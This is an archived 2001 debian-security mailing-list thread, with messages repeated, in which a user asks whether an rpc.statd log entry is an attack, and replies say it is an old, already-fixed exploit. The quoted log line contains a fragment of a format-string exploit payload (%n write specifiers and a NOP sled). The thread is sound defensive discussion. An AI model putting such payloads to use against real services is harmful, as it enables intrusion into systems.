subject:"rpc.statd being attacked\?"

Re: rpc.statd being attacked?

2001-08-21 Thread kath


I think this is an 800 year old Red Hat exploit, so probably no worries.

No need to worry, but any rpc services are lousy to have running anyway.

- k

- Original Message -
From: Daniel Schepler [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, August 21, 2001 4:28 PM
Subject: rpc.statd being attacked?


 I've gotten logs several times that read something like

 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error
for ^X

F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F
F

BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10
x%n%

192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20

 (This is at least the way it reads in less.)  For now I've just shut
 down the rpc.statd daemon, but I was wondering if this is a known
 attack.
 --
 Daniel Schepler  Please don't disillusion me.  I
 [EMAIL PROTECTED]haven't had breakfast yet.
  -- Orson Scott Card


 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: rpc.statd being attacked?

2001-08-21 Thread Daniel Jacobowitz


On Tue, Aug 21, 2001 at 01:28:24PM -0700, Daniel Schepler wrote:
 I've gotten logs several times that read something like
 
 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
 F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF
 BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%

You're safe.  It was fixed before potato; it would not have been logged
if it had succeeded.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

rpc.statd being attacked?

2001-08-21 Thread Daniel Schepler

I've gotten logs several times that read something like

Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF
BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%
192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

(This is at least the way it reads in less.)  For now I've just shut
down the rpc.statd daemon, but I was wondering if this is a known
attack.
-- 
Daniel Schepler  Please don't disillusion me.  I
[EMAIL PROTECTED]haven't had breakfast yet.
 -- Orson Scott Card

Re: rpc.statd being attacked?

2001-08-21 Thread kath

I think this is an 800 year old Red Hat exploit, so probably no worries.

No need to worry, but any rpc services are lousy to have running anyway.

- k

- Original Message -
From: Daniel Schepler [EMAIL PROTECTED]
To: debian-security@lists.debian.org
Sent: Tuesday, August 21, 2001 4:28 PM
Subject: rpc.statd being attacked?


 I've gotten logs several times that read something like

 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error
for ^X

F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F
F

BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10
x%n%

192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20

 (This is at least the way it reads in less.)  For now I've just shut
 down the rpc.statd daemon, but I was wondering if this is a known
 attack.
 --
 Daniel Schepler  Please don't disillusion me.  I
 [EMAIL PROTECTED]haven't had breakfast yet.
  -- Orson Scott Card


 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]

Re: rpc.statd being attacked?

2001-08-21 Thread Daniel Jacobowitz

On Tue, Aug 21, 2001 at 01:28:24PM -0700, Daniel Schepler wrote:
 I've gotten logs several times that read something like
 
 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
 F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF
 BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%

You're safe.  It was fixed before potato; it would not have been logged
if it had succeeded.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer

Re: rpc.statd being attacked?

Re: rpc.statd being attacked?

rpc.statd being attacked?

Re: rpc.statd being attacked?

Re: rpc.statd being attacked?

5 matches

Site Navigation

Mail list logo

Footer information